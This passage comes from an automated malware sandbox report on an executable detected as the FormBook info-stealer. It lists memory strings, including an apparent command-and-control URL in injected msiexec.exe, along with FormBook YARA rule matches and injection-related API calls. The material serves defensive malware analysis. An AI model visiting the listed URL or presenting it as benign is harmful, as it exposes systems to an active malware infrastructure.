          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krcom
          Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krn-u
          Source: explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msiexec.exe, 00000009.00000002.912045913.00000000049E2000.00000004.00000001.sdmpString found in binary or memory: https://mollysmulligan.com/8u3b/?DzrXY=Q16
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: g1EhgmCqCD.exe, 00000001.00000002.667518282.0000000000CB0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00418392 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019CAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9560 NtWriteFile,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019CB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019CA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019CA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019CA770 NtOpenThread,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00ECB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00ECAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00ECA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00ECA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00ECA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E81B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E8260 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E82E0 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E8390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E8392 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_00CAB264
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_00CAC2B0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_00CA9990
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_00CADF71
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_04F77B3C
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_04F7A2D6
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041B944
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041BB84
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00408C4B
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00408C50
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041BCF5
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041C5ED
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041B70F
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2581
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A525DD
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199D5E0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198F900
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A52D07
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01980D20
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A4120
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A51D55
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199B090
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A520A8
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A528EC
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199841F
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41002
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BEBB0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A51FF1
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4DBD2
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A52B28
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A522AE
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A52EF7
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F528EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F520A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4D466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F41002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F525DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F51D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E80D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F52D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F52EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F522AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F51FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4DBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBEBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F52B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EB944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EBB84
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001D8C50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001D8C4B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EBCF5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001D2D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EC5ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001D2FB0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: String function: 0198B150 appears 35 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00E8B150 appears 35 times
          Source: g1EhgmCqCD.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: g1EhgmCqCD.exeBinary or memory string: OriginalFilename vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000000.643686589.00000000005B2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameOnSerializedAttribute.exeB vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.667518282.0000000000CB0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.673721469.00000000072E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.672157538.0000000005AB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameIEFRAME.DLLD vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.672229683.0000000005B30000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.675343588.0000000008E80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exeBinary or memory string: OriginalFilename vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000003.00000000.665930767.0000000000E62000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameOnSerializedAttribute.exeB vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000003.00000002.736288628.000000000379F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000003.00000002.728784074.0000000001A7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exeBinary or memory string: OriginalFilenameOnSerializedAttribute.exeB vs g1EhgmCqCD.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: g1EhgmCqCD.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
